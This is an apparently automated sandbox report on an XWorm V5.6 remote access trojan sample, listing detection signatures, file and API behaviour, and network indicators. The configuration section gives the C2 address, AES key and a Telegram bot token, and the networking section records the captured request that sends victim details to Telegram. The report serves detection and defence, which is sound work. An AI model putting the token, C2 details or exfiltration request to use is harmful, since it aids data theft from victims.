Windows Analysis Report
DA92phBHUS.exe

Overview

General Information

Sample name: DA92phBHUS.exe
renamed because original name is a hash value
Original sample name: 649673218a19e8fd278c99d1355949f4.exe
Analysis ID: 1544503
MD5: 649673218a19e8fd278c99d1355949f4
SHA1: da2b13b98dbb3ba3973388866860cb7cb3d2b59e
SHA256: 7a2c1437ed5ff19adf078f17881fc836a4b08d3eaaff243d5ca77577f5880169
Tags: 32exe
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["193.41.226.233"], "Port": "2222", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: RegAsm.exe.3608.23.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage"}
Multi AV Scanner detection for submitted file
Source: DA92phBHUS.exe ReversingLabs: Detection: 18%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.4% probability
Sample uses string decryption to hide its real strings
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: 193.41.226.233
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: 2222
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: <123456789>
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: <Xwormmm>
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: XWORM v5.6
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: USB.exe
Uses 32bit PE files
Source: DA92phBHUS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64427 version: TLS 1.2
Source: DA92phBHUS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00EA4005
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00EA494A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00EA3CE2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00EAC2FF
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_00EACD9F
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EACD14 FindFirstFileW,FindClose, 10_2_00EACD14
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00EAF5D8
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00EAF735
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00EAFA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00354005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_00354005
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 18_2_0035C2FF
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035494A GetFileAttributesW,FindFirstFileW,FindClose, 18_2_0035494A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035CD14 FindFirstFileW,FindClose, 18_2_0035CD14
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 18_2_0035CD9F
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_0035F5D8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_0035F735
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 18_2_0035FA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00353CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_00353CE2
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\438799 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\438799\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:64431 -> 193.41.226.233:2222
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.41.226.233:2222 -> 192.168.2.4:64431
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:64431 -> 193.41.226.233:2222
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:64427 -> 149.154.167.220:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 193.41.226.233
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:64431 -> 193.41.226.233:2222
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: AVORODE AVORODE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 10_2_00EB29BA
Source: global traffic HTTP traffic detected: GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: nAtuEYczbaU.nAtuEYczbaU
Source: global traffic DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: RegAsm.exe, 00000017.00000002.2973858744.000000000306C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: DA92phBHUS.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DA92phBHUS.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: DA92phBHUS.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: DA92phBHUS.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: DA92phBHUS.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: DA92phBHUS.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: DA92phBHUS.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DA92phBHUS.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DA92phBHUS.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: DA92phBHUS.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: DA92phBHUS.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: DA92phBHUS.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: DA92phBHUS.exe String found in binary or memory: http://ocsp.digicert.com0N
Source: DA92phBHUS.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744485289.0000000000F09000.00000002.00000001.01000000.00000006.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, ImageSyncProX.scr, 00000012.00000002.1844874611.00000000003B9000.00000002.00000001.01000000.00000008.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: DA92phBHUS.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Dump.pif, 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=67952
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: DA92phBHUS.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: Dump.pif.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 64427 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64427
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64427 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 10_2_00EB4830
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00364830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 18_2_00364830
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 10_2_00EB4632
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Potential key logger detected (key state polling based)
